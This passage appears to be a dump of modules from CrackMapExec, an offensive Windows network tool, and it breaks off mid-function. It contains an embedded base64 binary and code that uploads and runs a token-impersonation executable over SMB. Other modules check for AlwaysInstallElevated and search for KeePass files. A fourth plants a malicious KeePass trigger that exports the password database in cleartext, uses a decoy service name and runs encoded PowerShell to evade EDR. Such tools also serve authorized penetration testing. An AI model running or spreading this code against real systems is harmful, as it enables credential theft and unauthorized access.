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SCtKK2grqiusK64rsCuyK7Qrtiu4K7orvCu+K4ArwivEK8YryCvKK8wrzivAGABALgAAABQrFisYKxorHCseKyArIiskKyYrKCsqKywrLiswKzIrNCs2KzgrOis8Kz4rACtCK0QrRitIK0orTCtOK1ArUitUK1YrWCtaK1wrXitgK2IrZCtmK2grbCtuK3Arcit0K3YreCt6K3wrfitAK4IrhCuGK4griiuMK44rkCuSK5QrliuYK5ornCueK6AroiukK6YrqCuqK6wrriuwK7IrtCu2K7gruiu8K74rgCvCK8AAABwAQCwAQAA0KLYouCi6KLwoviiAKMIoxCjGKMgoyijMKM4o0CjSKOoo7CjuKPAoxikKKQ4pEikWKRopHikiKSYpKikuKTIpNik6KT4pAilGKUopTilSKVYpWileKWIpZilqKW4pcil2KXopfilCKYYpiimOKZIplimaKZ4poimmKaoprimyKbYpuim+KYIpxinKKc4p0inWKdop3iniKeYp6inuKfIp9in6Kf4pwioGKgoqDioSKhYqGioeKiIqJioqKi4qMio2KjoqPioCKkYqSipOKlIqVipaKl4qYipmKmoqbipyKnYqeip+KkIqhiqKKo4qkiqWKpoqniqiKqYqqiquKrIqtiq6Kr4qgirGKsoqzirSKtYq2ireKuIq5irqKu4q8ir2Kvoq/irCKwYrCisOKxIrFisaKx4rIismKyorLisyKzYrOis+KwIrRitKK04rUitWK1orXitiK2YraituK3Irdit6K34rQiuGK4orjiuSK5YrmiueK6IrpiuqK64rsiu2K7orviuCK8YryivOK9Ir1ivaK94r4ivmK+or7ivyK/Yr+iv+K8AAACAAQCEAAAACKAYoCigOKBIoFigaKB4oIigmKCooLigyKDYoOig+KAIoRihKKE4oUihWKFooXihiKGYoaihuKHIodih6KH4oQiiGKIoojiiSKJwroCukK6grrCuwK7QruCu8K4ArxCvIK8wr0CvUK9gr3CvgK+Qr6CvsK/Ar9Cv4K/wrwCQAQCgAQAAAKAQoCCgMKBAoFCgYKBwoICgkKCgoLCgwKDQoOCg8KAAoRChIKEwoUChUKFgoXChgKGQoaChsKHAodCh4KHwoQCiEKIgojCiQKJQomCicKKAopCioKKwosCi0KLgovCiAKMQoyCjMKNAo1CjYKNwo4CjkKOgo7CjwKPQo+Cj8KMApBCkIKQwpECkUKRgpHCkgKSQpKCksKTApNCk4KTwpAClEKUgpTClQKVQpWClcKWApZCloKWwpcCl0KXgpfClAKYQpiCmMKZAplCmYKZwpoCmkKagprCmwKbQpuCm8KYApxCnIKcwp0CnUKdgp3CngKeQp6CnsKfAp9Cn4KfwpwCoEKggqDCoQKhQqGCocKiAqJCooKiwqMCo0KjgqPCoAKkQqSCpMKlAqVCpYKlwqYCpkKmgqbCpwKnQqeCp8KkAqhCqIKowqkCqUKpgqnCqgKqQqqCqsKrAqtCq4KrwqgCrEKsgqzCrQKtQq2CrcKuAq5CroKuwq8Cr0Kvgq/CrAKwQrCCsMKxArFCsYKxwrICskKygrAAAAMABABwAAAAYrzCvOK/Ar9iv4K/or/Cv+K8AAADwAQBIAAAAqKHAoQiiKKJIomiiiKK4otCi2KLgohijIKNwqHiogKiIqJComKigqKiosKi4qMio0KjYqOCo6KjwqPioAKkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==\")\n if \"EXEC\" in module_options:\n self.cmd = module_options[\"EXEC\"]\n\n if \"TOKEN\" in module_options:\n self.token = module_options[\"TOKEN\"]\n\n if \"IMP_EXE\" in module_options:\n self.imp_exe = module_options[\"IMP_EXE\"]\n self.useembeded = False\n\n def list_available_primary_tokens(self, _, connection):\n command = f\"{self.tmp_dir}Impersonate.exe list\"\n return connection.execute(command, True)\n \n def on_admin_login(self, context, connection):\n\n if self.useembeded:\n file_to_upload = \"/tmp/Impersonate.exe\"\n with open(file_to_upload, 'wb') as impersonate:\n impersonate.write(self.impersonate_embedded)\n else:\n if path.isfile(self.imp_exe):\n file_to_upload = self.imp_exe\n else:\n context.log.error(f\"Cannot open {self.imp_exe}\")\n exit(1)\n\n context.log.display(f\"Uploading {self.impersonate}\")\n with open(file_to_upload, 'rb') as impersonate:\n try:\n connection.conn.putFile(self.share, f\"{self.tmp_share}{self.impersonate}\", impersonate.read)\n context.log.success(f\"Impersonate binary successfully uploaded\")\n except Exception as e:\n context.log.fail(f\"Error writing file to share {self.tmp_share}: {e}\")\n return\n\n try:\n if self.cmd == \"\" or self.token == \"\":\n context.log.display(f\"Listing available primary tokens\")\n p = self.list_available_primary_tokens(context, connection)\n for line in p.splitlines():\n token, token_integrity, token_owner = line.split(\" \", 2)\n context.log.highlight(f\"Primary token ID: {token:<2} {token_integrity:<6} {token_owner}\")\n else:\n impersonated_user = \"\"\n p = self.list_available_primary_tokens(context, connection)\n for line in p.splitlines():\n token_id, token_integrity, token_owner = line.split(\" \", 2)\n if token_id == self.token:\n impersonated_user = token_owner.strip()\n break\n\n if impersonated_user: \n context.log.display(f\"Executing {self.cmd} as {impersonated_user}\")\n command = f'{self.tmp_dir}Impersonate.exe exec {self.token} \\\"{self.cmd}\\\"'\n for line in connection.execute(command, True, methods=[\"smbexec\"]).splitlines():\n context.log.highlight(line)\n else:\n context.log.fail(f\"Invalid token ID submitted\")\n\n except Exception as e:\n context.log.fail(f\"Error runing command: {e}\")\n finally:\n try:\n connection.conn.deleteFile(self.share, f\"{self.tmp_share}{self.impersonate}\")\n context.log.success(f\"Impersonate binary successfully deleted\")\n except Exception as e:\n context.log.fail(f\"Error deleting Impersonate.exe on {self.share}: {e}\")\n" }, { "path": "cme/modules/install_elevated.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket.dcerpc.v5 import rrp\nfrom impacket.dcerpc.v5 import scmr\nfrom impacket.examples.secretsdump import RemoteOperations\n\n\nclass CMEModule:\n name = \"install_elevated\"\n description = \"Checks for AlwaysInstallElevated\"\n supported_protocols = [\"smb\"]\n opsec_safe = True\n multiple_hosts = True\n\n def options(self, context, module_options):\n \"\"\" \"\"\"\n\n def on_admin_login(self, context, connection):\n try:\n remote_ops = RemoteOperations(connection.conn, False)\n remote_ops.enableRegistry()\n\n try:\n ans_machine = rrp.hOpenLocalMachine(remote_ops._RemoteOperations__rrp)\n reg_handle = ans_machine[\"phKey\"]\n ans_machine = rrp.hBaseRegOpenKey(\n remote_ops._RemoteOperations__rrp,\n reg_handle,\n \"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Installer\",\n )\n key_handle = ans_machine[\"phkResult\"]\n data_type, aie_machine_value = rrp.hBaseRegQueryValue(\n remote_ops._RemoteOperations__rrp,\n key_handle,\n \"AlwaysInstallElevated\",\n )\n rrp.hBaseRegCloseKey(remote_ops._RemoteOperations__rrp, key_handle)\n\n if aie_machine_value == 0:\n context.log.highlight(\"AlwaysInstallElevated Status: 0 (Disabled)\")\n return\n except rrp.DCERPCSessionError:\n context.log.highlight(\"AlwaysInstallElevated Status: 0 (Disabled)\")\n return\n try:\n ans_user = rrp.hOpenCurrentUser(remote_ops._RemoteOperations__rrp)\n reg_handle = ans_user[\"phKey\"]\n ans_user = rrp.hBaseRegOpenKey(\n remote_ops._RemoteOperations__rrp,\n reg_handle,\n \"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Installer\",\n )\n key_handle = ans_user[\"phkResult\"]\n data_type, aie_user_value = rrp.hBaseRegQueryValue(\n remote_ops._RemoteOperations__rrp,\n key_handle,\n \"AlwaysInstallElevated\",\n )\n rrp.hBaseRegCloseKey(remote_ops._RemoteOperations__rrp, key_handle)\n except rrp.DCERPCSessionError:\n context.log.highlight(\"AlwaysInstallElevated Status: 1 (Enabled: Computer Only)\")\n return\n if aie_user_value == 0:\n context.log.highlight(\"AlwaysInstallElevated Status: 1 (Enabled: Computer Only)\")\n else:\n context.log.highlight(\"AlwaysInstallElevated Status: 1 (Enabled)\")\n finally:\n try:\n remote_ops.finish()\n except scmr.DCERPCSessionError as e:\n context.log.debug(f\"Received SessionError while attempting to clean up logins: {e}\")\n except Exception as e:\n context.log.debug(f\"Received general exception while attempting to clean up logins: {e}\")\n" }, { "path": "cme/modules/keepass_discover.py", "content": "from csv import reader\n\n\nclass CMEModule:\n \"\"\"\n Search for KeePass-related files and process\n\n Module by @d3lb3\n Inspired by @harmj0y https://raw.githubusercontent.com/GhostPack/KeeThief/master/PowerShell/KeePassConfig.ps1\n \"\"\"\n\n name = \"keepass_discover\"\n description = \"Search for KeePass-related files and process.\"\n supported_protocols = [\"smb\"]\n opsec_safe = True # only legitimate commands are executed on the remote host (search process and files)\n multiple_hosts = True\n\n def __init__(self):\n self.search_type = \"ALL\"\n self.search_path = \"'C:\\\\Users\\\\','$env:PROGRAMFILES','env:ProgramFiles(x86)'\"\n\n def options(self, context, module_options):\n \"\"\"\n SEARCH_TYPE Specify what to search, between:\n PROCESS Look for running KeePass.exe process only\n FILES Look for KeePass-related files (KeePass.config.xml, .kdbx, KeePass.exe) only, may take some time\n ALL Look for running KeePass.exe process and KeePass-related files (default)\n\n SEARCH_PATH Comma-separated remote locations where to search for KeePass-related files (you must add single quotes around the paths if they include spaces)\n Default: 'C:\\\\Users\\\\','$env:PROGRAMFILES','env:ProgramFiles(x86)'\n \"\"\"\n\n if \"SEARCH_PATH\" in module_options:\n self.search_path = module_options[\"SEARCH_PATH\"]\n\n if \"SEARCH_TYPE\" in module_options:\n self.search_type = module_options[\"SEARCH_TYPE\"]\n\n def on_admin_login(self, context, connection):\n if self.search_type == \"ALL\" or self.search_type == \"PROCESS\":\n # search for keepass process\n search_keepass_process_command_str = 'powershell.exe \"Get-Process kee* -IncludeUserName | Select-Object -Property Id,UserName,ProcessName | ConvertTo-CSV -NoTypeInformation\"'\n search_keepass_process_output_csv = connection.execute(search_keepass_process_command_str, True) # we return the powershell command as a CSV for easier column parsing\n csv_reader = reader(search_keepass_process_output_csv.split(\"\\n\"), delimiter=\",\")\n next(csv_reader) # to skip the csv header line\n row_number = 0 # as csv_reader is an iterator we can't get its length without exhausting it\n for row in csv_reader:\n row_number += 1\n keepass_process_id = row[0]\n keepass_process_username = row[1]\n keepass_process_name = row[2]\n context.log.highlight(\n 'Found process \"{}\" with PID {} (user {})'.format(\n keepass_process_name,\n keepass_process_id,\n keepass_process_username,\n )\n )\n if row_number == 0:\n context.log.display(\"No KeePass-related process was found\")\n\n # search for keepass-related files\n if self.search_type == \"ALL\" or self.search_type == \"FILES\":\n search_keepass_files_payload = \"Get-ChildItem -Path {} -Recurse -Force -Include ('KeePass.config.xml','KeePass.exe','*.kdbx') -ErrorAction SilentlyContinue | Select FullName -ExpandProperty FullName\".format(self.search_path)\n search_keepass_files_cmd = 'powershell.exe \"{}\"'.format(search_keepass_files_payload)\n search_keepass_files_output = connection.execute(search_keepass_files_cmd, True).split(\"\\r\\n\")\n found = False\n found_xml = False\n for file in search_keepass_files_output:\n if \"KeePass\" in file or \"kdbx\" in file:\n if \"xml\" in file:\n found_xml = True\n found = True\n context.log.highlight(\"Found {}\".format(file))\n if not found:\n context.log.display(\"No KeePass-related file were found\")\n elif not found_xml:\n context.log.fail(\"No config settings file found !!!\")\n" }, { "path": "cme/modules/keepass_trigger.py", "content": "import os\nimport sys\nimport json\nfrom xmltodict import parse\nfrom time import sleep\nfrom csv import reader\nfrom base64 import b64encode\nfrom io import BytesIO, StringIO\nfrom xml.etree import ElementTree\nfrom cme.helpers.powershell import get_ps_script\n\n\nclass CMEModule:\n \"\"\"\n Make use of KeePass' trigger system to export the database in cleartext\n References: https://keepass.info/help/v2/triggers.html\n https://web.archive.org/web/20211017083926/http://www.harmj0y.net:80/blog/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/\n\n Module by @d3lb3, inspired by @harmj0y work\n \"\"\"\n\n name = \"keepass_trigger\"\n description = \"Set up a malicious KeePass trigger to export the database in cleartext.\"\n supported_protocols = [\"smb\"]\n # while the module only executes legit powershell commands on the target (search and edit files)\n # some EDR like Trend Micro flag base64-encoded powershell as malicious\n # the option PSH_EXEC_METHOD can be used to avoid such execution, and will drop scripts on the target\n opsec_safe = False\n multiple_hosts = False\n\n def __init__(self):\n # module options\n self.action = None\n self.keepass_config_path = None\n self.keepass_user = None\n self.export_name = \"export.xml\"\n self.export_path = \"C:\\\\Users\\\\Public\"\n self.powershell_exec_method = \"PS1\"\n\n # additional parameters\n self.share = \"C$\"\n self.remote_temp_script_path = \"C:\\\\Windows\\\\Temp\\\\temp.ps1\"\n self.keepass_binary_path = \"C:\\\\Program Files\\\\KeePass Password Safe 2\\\\KeePass.exe\"\n self.local_export_path = \"/tmp\"\n self.trigger_name = \"export_database\"\n self.poll_frequency_seconds = 5\n self.dummy_service_name = \"OneDrive Sync KeePass\"\n\n with open(get_ps_script(\"keepass_trigger_module/RemoveKeePassTrigger.ps1\"), \"r\") as remove_trigger_script_file:\n self.remove_trigger_script_str = remove_trigger_script_file.read()\n\n with open(get_ps_script(\"keepass_trigger_module/AddKeePassTrigger.ps1\"), \"r\") as add_trigger_script_file:\n self.add_trigger_script_str = add_trigger_script_file.read()\n\n with open(get_ps_script(\"keepass_trigger_module/RestartKeePass.ps1\"), \"r\") as restart_keepass_script_file:\n self.restart_keepass_script_str = restart_keepass_script_file.read()\n\n def options(self, context, module_options):\n \"\"\"\n ACTION (mandatory) Performs one of the following actions, specified by the user:\n ADD insert a new malicious trigger into KEEPASS_CONFIG_PATH's specified file\n CHECK check if a malicious trigger is currently set in KEEPASS_CONFIG_PATH's\n specified file\n RESTART restart KeePass using a Windows service (used to force trigger reload),\n if multiple KeePass process are running, rely on USER option\n POLL search for EXPORT_NAME file in EXPORT_PATH folder\n (until found, or manually exited by the user)\n CLEAN remove malicious trigger from KEEPASS_CONFIG_PATH as well as database\n export files from EXPORT_PATH\n ALL performs ADD, CHECK, RESTART, POLL, CLEAN actions one after the other\n\n KEEPASS_CONFIG_PATH Path of the remote KeePass configuration file where to add a malicious trigger\n (used by ADD, CHECK and CLEAN actions)\n USER Targeted user running KeePass, used to restart the appropriate process\n (used by RESTART action)\n\n EXPORT_NAME Name fo the database export file, default: export.xml\n EXPORT_PATH Path where to export the KeePass database in cleartext\n default: C:\\\\Users\\\\Public, %APPDATA% works well too for user permissions\n\n PSH_EXEC_METHOD Powershell execution method, may avoid detections depending on the AV/EDR in use\n (while no 'malicious' command is executed):\n ENCODE run scripts through encoded oneliners\n PS1 run scripts through a file dropped in C:\\\\Windows\\\\Temp (default)\n\n Not all variables used by the module are available as options (ex: trigger name, temp folder path, etc.),\n but they can still be easily edited in the module __init__ code if needed\n \"\"\"\n\n if \"ACTION\" in module_options:\n if module_options[\"ACTION\"] not in [\n \"ADD\",\n \"CHECK\",\n \"RESTART\",\n \"SINGLE_POLL\",\n \"POLL\",\n \"CLEAN\",\n \"ALL\",\n ]:\n context.log.fail(\"Unrecognized action, use --options to list available parameters\")\n exit(1)\n else:\n self.action = module_options[\"ACTION\"]\n else:\n context.log.fail(\"Missing ACTION option, use --options to list available parameters\")\n exit(1)\n\n if \"KEEPASS_CONFIG_PATH\" in module_options:\n self.keepass_config_path = module_options[\"KEEPASS_CONFIG_PATH\"]\n\n if \"USER\" in module_options:\n self.keepass_user = module_options[\"USER\"]\n\n if \"EXPORT_NAME\" in module_options:\n self.export_name = module_options[\"EXPORT_NAME\"]\n\n if \"EXPORT_PATH\" in module_options:\n self.export_path = module_options[\"EXPORT_PATH\"]\n\n if \"PSH_EXEC_METHOD\" in module_options:\n if module_options[\"PSH_EXEC_METHOD\"] not in [\"ENCODE\", \"PS1\"]:\n context.log.fail(\"Unrecognized powershell execution method, use --options to list available parameters\")\n exit(1)\n else:\n self.powershell_exec_method = module_options[\"PSH_EXEC_METHOD\"]\n\n def on_admin_login(self, context, connection):\n if self.action == \"ADD\":\n self.add_trigger(context, connection)\n elif self.action == \"CHECK\":\n self.check_trigger_added(context, connection)\n elif self.action == \"RESTART\":\n self.restart(context, connection)\n elif self.action == \"POLL\":\n self.poll(context, connection)\n elif self.action == \"CLEAN\":\n self.clean(context, connection)\n self.restart(context, connection)\n elif self.action == \"ALL\":\n self.all_in_one(context, connection)\n\n def add_trigger(self, context, connection):\n \"\"\"Add a malicious trigger to a remote KeePass config file using the powershell script AddKeePassTrigger.ps1\"\"\"\n\n # check if the specified KeePass configuration file exists\n if self.trigger_added(context, connection):\n context.log.display(f\"The specified configuration file {self.keepass_config_path} already contains a trigger called '{self.trigger_name}', skipping\")\n return\n\n context.log.display(f\"Adding trigger '{self.trigger_name}' to '{self.keepass_config_path}'\")\n\n # prepare the trigger addition script based on user-specified parameters (e.g: trigger name, etc)\n # see data/keepass_trigger_module/AddKeePassTrigger.ps1 for the full script\n self.add_trigger_script_str = self.add_trigger_script_str.replace(\"REPLACE_ME_ExportPath\", self.export_path)\n self.add_trigger_script_str = self.add_trigger_script_str.replace(\"REPLACE_ME_ExportName\", self.export_name)\n self.add_trigger_script_str = self.add_trigger_script_str.replace(\"REPLACE_ME_TriggerName\", self.trigger_name)\n self.add_trigger_script_str = self.add_trigger_script_str.replace(\"REPLACE_ME_KeePassXMLPath\", self.keepass_config_path)\n\n # add the malicious trigger to the remote KeePass configuration file\n if self.powershell_exec_method == \"ENCODE\":\n add_trigger_script_b64 = b64encode(self.add_trigger_script_str.encode(\"UTF-16LE\")).decode(\"utf-8\")\n add_trigger_script_cmd = f\"powershell.exe -e {add_trigger_script_b64}\"\n connection.execute(add_trigger_script_cmd)\n sleep(2) # as I noticed some delay may happen with the encoded powershell command execution\n elif self.powershell_exec_method == \"PS1\":\n try:\n self.put_file_execute_delete(context, connection, self.add_trigger_script_str)\n except Exception as e:\n context.log.fail(f\"Error while adding malicious trigger to file: {e}\")\n sys.exit(1)\n\n # checks if the malicious trigger was effectively added to the specified KeePass configuration file\n if self.trigger_added(context, connection):\n context.log.success(f\"Malicious trigger successfully added, you can now wait for KeePass reload and poll the exported files\")\n else:\n context.log.fail(f\"Unknown error when adding malicious trigger to file\")\n sys.exit(1)\n\n def check_trigger_added(self, context, connection):\n \"\"\"check if the trigger is added to the config file XML tree\"\"\"\n\n if self.trigger_added(context, connection):\n context.log.display(f\"Malicious trigger '{self.trigger_name}' found in '{self.keepass_config_path}'\")\n else:\n context.log.display(f\"No trigger '{self.trigger_name}' found in '{self.keepass_config_path}'\")\n\n def restart(self, context, connection):\n \"\"\"Force the restart of KeePass process using a Windows service defined using the powershell script RestartKeePass.ps1\n If multiple process belonging to different users are running simultaneously,\n relies on the USER option to choose which one to restart\"\"\"\n\n # search for keepass processes\n search_keepass_process_command_str = 'powershell.exe \"Get-Process keepass* -IncludeUserName | Select-Object -Property Id,UserName,ProcessName | ConvertTo-CSV -NoTypeInformation\"'\n search_keepass_process_output_csv = connection.execute(search_keepass_process_command_str, True)\n # we return the powershell command as a CSV for easier column parsing\n csv_reader = reader(search_keepass_process_output_csv.split(\"\\n\"), delimiter=\",\")\n next(csv_reader) # to skip the header line\n keepass_process_list = list(csv_reader)\n # check if multiple processes belonging to different users are running (in order to choose which one to restart)\n keepass_users = []\n for process in keepass_process_list:\n keepass_users.append(process[1])\n if len(keepass_users) == 0:\n context.log.fail(\"No running KeePass process found, aborting restart\")\n return\n elif len(keepass_users) == 1: # if there is only 1 KeePass process running\n # if KEEPASS_USER option is specified then we check if the user matches\n if self.keepass_user and (keepass_users[0] != self.keepass_user and keepass_users[0].split(\"\\\\\")[1] != self.keepass_user):\n context.log.fail(f\"Specified user {self.keepass_user} does not match any KeePass process owner, aborting restart\")\n return\n else:\n self.keepass_user = keepass_users[0]\n elif len(keepass_users) > 1 and self.keepass_user:\n found_user = False # we search through every KeePass process owner for the specified user\n for user in keepass_users:\n if user == self.keepass_user or user.split(\"\\\\\")[1] == self.keepass_user:\n self.keepass_user = keepass_users[0]\n found_user = True\n if not found_user:\n context.log.fail(f\"Specified user {self.keepass_user} does not match any KeePass process owner, aborting restart\")\n return\n else:\n context.log.fail(\"Multiple KeePass processes were found, please specify parameter USER to target one\")\n return\n\n context.log.display(\"Restarting {}'s KeePass process\".format(keepass_users[0]))\n\n # prepare the restarting script based on user-specified parameters (e.g: keepass user, etc)\n # see data/keepass_trigger_module/RestartKeePass.ps1\n self.restart_keepass_script_str = self.restart_keepass_script_str.replace(\"REPLACE_ME_KeePassUser\", self.keepass_user)\n self.restart_keepass_script_str = self.restart_keepass_script_str.replace(\"REPLACE_ME_KeePassBinaryPath\", self.keepass_binary_path)\n self.restart_keepass_script_str = self.restart_keepass_script_str.replace(\"REPLACE_ME_DummyServiceName\", self.dummy_service_name)\n\n # actually performs the restart on the remote target\n if self.powershell_exec_method == \"ENCODE\":\n restart_keepass_script_b64 = b64encode(self.restart_keepass_script_str.encode(\"UTF-16LE\")).decode(\"utf-8\")\n restart_keepass_script_cmd = \"powershell.exe -e {}\".format(restart_keepass_script_b64)\n connection.execute(restart_keepass_script_cmd)\n elif self.powershell_exec_method == \"PS1\":\n try:\n self.put_file_execute_delete(context, connection, self.restart_keepass_script_str)\n except Exception as e:\n context.log.fail(\"Error while restarting KeePass: {}\".format(e))\n return\n\n def poll(self, context, connection):\n \"\"\"Search for the cleartext database export file in the specified export folder\n (until found, or manually exited by the user)\"\"\"\n found = False\n context.log.display(f\"Polling for database export every {self.poll_frequency_seconds} seconds, please be patient\")\n context.log.display(\"we need to wait for the target to enter his master password ! Press CTRL+C to abort and use clean option to cleanup everything\")\n # if the specified path is %APPDATA%, we need to check in every user's folder\n if self.export_path == \"%APPDATA%\" or self.export_path == \"%appdata%\":\n poll_export_command_str = \"powershell.exe \\\"Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output ('C:\\\\Users\\\\'+$_.Name+'\\\\AppData\\\\Roaming\\\\{}')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}\\\"\".format(self.export_name)\n else:\n export_full_path = f\"'{self.export_path}\\\\{self.export_name}'\"\n poll_export_command_str = 'powershell.exe \"if (Test-Path {} -PathType leaf){{ Write-Output {} }}\"'.format(export_full_path, 